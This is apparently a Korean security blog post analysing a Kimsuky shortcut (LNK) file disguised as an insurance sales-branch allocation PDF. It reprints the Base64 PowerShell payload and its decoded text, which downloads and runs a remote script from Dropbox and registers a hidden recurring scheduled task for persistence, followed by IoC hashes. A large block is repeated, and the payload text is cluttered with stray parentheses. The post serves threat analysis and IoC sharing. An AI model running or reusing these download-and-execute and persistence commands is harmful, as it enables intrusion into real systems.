김수키(Kimsuky)에서 만든 보험 사칭 악성코드-241002-2024년 GA영업본부 담당지점 배분(10월)(2025.1.31)
Contents
오늘은 언제나 존경도 하지도 않고 경애도 하지 않는 북한 정찰총국 산하 해킹 조직인 김수키(Kimsuky) 에서 만든 악성코드인 241002-2024년 GA영업본부 담당지점 배분(10월)(2025.1.31) 에 대해 알아보겠습니다.
파일명: 241002-2024년 GA영업본부 담당지점 배분(10월) v2.pdf.lnk
사이즈: 318,318 Bytes
MD5: 8a08fd5e8298c823e4ab356508d70490
SHA-1: 086be54505ef95d83be71d6b1e959610d36dc619
SHA-256: 71d56c61b765eee74dca65910ab9e0e2b35b21bcf6c97241ca7188a75f082f6f
해당 악성코드는 일단 기본적으로 파워셸(PowerShell)를 악용을 하고 있으며 해당 악성코드를 열어보면 Base64 로 돼 있는데 이것은 그냥 CyberChef로 풀어버리면 간단하게 해결을 볼 수가 있습니다.
JGhoaCA9IEpvaW4tUGF0(a)CA(o)(W)1N5c3RlbS5JTy5QYXRoXTo6R2
V0VGVtcFBhdGgoKSkgIjI0MTAwMi0yMDI064WEIEdB7JiB7JeF67O467a
AIOuLtOuLuey(n)g)O(y)gkCDrsLDrtoQoMTDsm5QpIHYyLnBkZiI7IHd
nZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbn((Q)u)(Y)2(9)tL
3NjbC9maS92eDIzMzkxemR4cXUzcWlyYzV6N2(c)vMjQxMDAyLTIwMjQtR0EtMTAtd
jIucGRmP3Jsa2V5PWloNnNlb2NxN2NzYTRpYWIzbWQ0bTltMDgmc3Q9NnNqNHl5enA
mZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW
52Ok(F)w(c)ERhdGEpICJjaHJvbWUucHMxIjs(g)JHN0ciA9ICckYWFhID0gSm9pbi1
QYXRoICgkZW52OkFwcER(h)dGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6
Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nczU4dTZxdnZ4b3J6dH
R2MDl5dnQva3hzeGh4LXgudHh0P3Jsa2V5PXY4NnBkN2kybmptN3UwcG(Z)1dGwwa2
51Njgmc3Q9enkxdzZuNjcmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUt
SXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHwgT3V0LUZpbGUgLUZpbGVQYXRoICR
wcHAgLUVuY29kaW5(n)(I)FVURjg7ICR(h)Y3Rpb24gPSBOZXctU2NoZWR1bGVkVGFza0Fj
dGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnIC1Bcmd1bWVudCAnLVdpbmRvd(1)N0e
WxlIEhpZGRlbiAtbm9wICAtTm9uSW50ZXJhY3RpdmUgLU5vUHJv(Z)(m)(l)sZSAtRXhlY3
V0aW9uUG9saWN5IEJ5c(G)FzcyAtQ29tbWFuZCAiJiB7JGFiYyA9IEpvaW4tUGF0aCAoJGV
udjpBcHBEYXRhKSBcImNocm(9)tZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWdnZXIgPSBO
ZXctU2NoZWR1bGVkVGFza1Rya(W)(d)nZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWl
udXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZVNwYW4gLU1()pbnV0ZXMg
MzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGFza1NldHRpb(m)d(z)(U)2V0IC1Ia
WRkZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJDaHJvbWVVcGRhdGVUY
XNrTWFjaGluZSIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5nc
yAkc2V0dGluZ3M7ICAkYW(F)hID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1
fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5
jb20vc2NsL2ZpL3N1bWNoOG8xMmE0a283d3FxdHJnby9reH(N)4aHgtZi50eHQ/cmxrZXk9a
Th5dG81eGczdW5mZnM5d2F3aHl0dTF2NCZzdD15ajllcWxlcCZkbD0wIiAtT3V0RmlsZSAkY
WFhOyAmICRhYWE7IFJl
bW92ZS1JdGVtIC1QYXRoICRhYWEgL(U)ZvcmNlOw==
CyberChef Base64 디코딩 결과
$hhh = Join-Path ([System.(I)O.Path]::GetT(em)pPath())
"241002-2024년 GA영업(본)부 담당지점 배분(10월) v2(.)p
df"; wget -Uri "hxxps://dl.dropboxusercontent(.)com/scl
/fi/vx23391zdxqu3qirc5z7g/241002-2024-GA-10-v2(.)pdf?rlk
ey=ih6seocq7csa4iab3md4m(9)m08&st=6sj4yyzp&dl=0" -OutFil
e $hhh; & $hhh; $ppp = Join-Path ($en(v):AppData) "chrome
(.)ps1"; $str = '$aaa = Join(-)Path ($env:(Ap)pData) "tem
p.ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/s
cl/fi/gs58u6qvv(x)orzttv09yvt/kxsxhx-x.txt?rlkey=v86pd7i2nj
m(7)u0pfutl0knu68&st=zy1w6n67&dl=0" -OutFile $aaa; & ($)aaa
; Remove-Item -P(a)th $aaa -Force;'; $str | Out-File -Fil(e)
Path $ppp -Encoding UTF(8); $action = New-Sche(d)uledTaskAct
ion -Execute 'PowerShell(.)exe' -Argument '-Win(d)owStyle Hi
dden -nop -Non(I)nteractive -NoProfile -ExecutionP(o)licy B
ypas(s) -Command "& {$abc = Joi(n)-Path ($env:A(p)pData) \"c
hrome(.)ps1\"; & $abc;}"'; $trigger = New-Sche(d)uledTaskTri
gger -Once -At (Get-Date).Add(M)inutes(5) -R(e)petitionInter
val ((N)ew-TimeSpan -Min(u)tes 30); $settings = New-(S)chedu
ledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName
"ChromeUp(d)ateTaskMachine" -Action $action -Trigger $trigge
r -Settings $settings; $aaa = …
파일명: 241002-2024년 GA영업본부 담당지점 배분(10월) v2.pdf.lnk
사이즈: 318,318 Bytes
MD5: 8a08fd5e8298c823e4ab356508d70490
SHA-1: 086be54505ef95d83be71d6b1e959610d36dc619
SHA-256: 71d56c61b765eee74dca65910ab9e0e2b35b21bcf6c97241ca7188a75f082f6f
해당 악성코드는 일단 기본적으로 파워셸(PowerShell)를 악용을 하고 있으며 해당 악성코드를 열어보면 Base64 로 돼 있는데 이것은 그냥 CyberChef로 풀어버리면 간단하게 해결을 볼 수가 있습니다.
JGhoaCA9IEpvaW4tUGF0(a)CA(o)(W)1N5c3RlbS5JTy5QYXRoXTo6R2
V0VGVtcFBhdGgoKSkgIjI0MTAwMi0yMDI064WEIEdB7JiB7JeF67O467a
AIOuLtOuLuey(n)g)O(y)gkCDrsLDrtoQoMTDsm5QpIHYyLnBkZiI7IHd
nZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbn((Q)u)(Y)2(9)tL
3NjbC9maS92eDIzMzkxemR4cXUzcWlyYzV6N2(c)vMjQxMDAyLTIwMjQtR0EtMTAtd
jIucGRmP3Jsa2V5PWloNnNlb2NxN2NzYTRpYWIzbWQ0bTltMDgmc3Q9NnNqNHl5enA
mZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW
52Ok(F)w(c)ERhdGEpICJjaHJvbWUucHMxIjs(g)JHN0ciA9ICckYWFhID0gSm9pbi1
QYXRoICgkZW52OkFwcER(h)dGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6
Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nczU4dTZxdnZ4b3J6dH
R2MDl5dnQva3hzeGh4LXgudHh0P3Jsa2V5PXY4NnBkN2kybmptN3UwcG(Z)1dGwwa2
51Njgmc3Q9enkxdzZuNjcmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUt
SXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHwgT3V0LUZpbGUgLUZpbGVQYXRoICR
wcHAgLUVuY29kaW5(n)(I)FVURjg7ICR(h)Y3Rpb24gPSBOZXctU2NoZWR1bGVkVGFza0Fj
dGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnIC1Bcmd1bWVudCAnLVdpbmRvd(1)N0e
WxlIEhpZGRlbiAtbm9wICAtTm9uSW50ZXJhY3RpdmUgLU5vUHJv(Z)(m)(l)sZSAtRXhlY3
V0aW9uUG9saWN5IEJ5c(G)FzcyAtQ29tbWFuZCAiJiB7JGFiYyA9IEpvaW4tUGF0aCAoJGV
udjpBcHBEYXRhKSBcImNocm(9)tZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWdnZXIgPSBO
ZXctU2NoZWR1bGVkVGFza1Rya(W)(d)nZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWl
udXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZVNwYW4gLU1()pbnV0ZXMg
MzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGFza1NldHRpb(m)d(z)(U)2V0IC1Ia
WRkZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJDaHJvbWVVcGRhdGVUY
XNrTWFjaGluZSIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5nc
yAkc2V0dGluZ3M7ICAkYW(F)hID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1
fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5
jb20vc2NsL2ZpL3N1bWNoOG8xMmE0a283d3FxdHJnby9reH(N)4aHgtZi50eHQ/cmxrZXk9a
Th5dG81eGczdW5mZnM5d2F3aHl0dTF2NCZzdD15ajllcWxlcCZkbD0wIiAtT3V0RmlsZSAkY
WFhOyAmICRhYWE7IFJl
bW92ZS1JdGVtIC1QYXRoICRhYWEgL(U)ZvcmNlOw==
CyberChef Base64 디코딩 결과
$hhh = Join-Path ([System.(I)O.Path]::GetT(em)pPath())
"241002-2024년 GA영업(본)부 담당지점 배분(10월) v2(.)p
df"; wget -Uri "hxxps://dl.dropboxusercontent(.)com/scl
/fi/vx23391zdxqu3qirc5z7g/241002-2024-GA-10-v2(.)pdf?rlk
ey=ih6seocq7csa4iab3md4m(9)m08&st=6sj4yyzp&dl=0" -OutFil
e $hhh; & $hhh; $ppp = Join-Path ($en(v):AppData) "chrome
(.)ps1"; $str = '$aaa = Join(-)Path ($env:(Ap)pData) "tem
p.ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/s
cl/fi/gs58u6qvv(x)orzttv09yvt/kxsxhx-x.txt?rlkey=v86pd7i2nj
m(7)u0pfutl0knu68&st=zy1w6n67&dl=0" -OutFile $aaa; & ($)aaa
; Remove-Item -P(a)th $aaa -Force;'; $str | Out-File -Fil(e)
Path $ppp -Encoding UTF(8); $action = New-Sche(d)uledTaskAct
ion -Execute 'PowerShell(.)exe' -Argument '-Win(d)owStyle Hi
dden -nop -Non(I)nteractive -NoProfile -ExecutionP(o)licy B
ypas(s) -Command "& {$abc = Joi(n)-Path ($env:A(p)pData) \"c
hrome(.)ps1\"; & $abc;}"'; $trigger = New-Sche(d)uledTaskTri
gger -Once -At (Get-Date).Add(M)inutes(5) -R(e)petitionInter
val ((N)ew-TimeSpan -Min(u)tes 30); $settings = New-(S)chedu
ledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName
"ChromeUp(d)ateTaskMachine" -Action $action -Trigger $trigge
r -Settings $settings; $aaa = …
IoC
71d56c61b765eee74dca65910ab9e0e2b35b21bcf6c97241ca7188a75f082f6f
8a08fd5e8298c823e4ab356508d70490
086be54505ef95d83be71d6b1e959610d36dc619
8a08fd5e8298c823e4ab356508d70490
086be54505ef95d83be71d6b1e959610d36dc619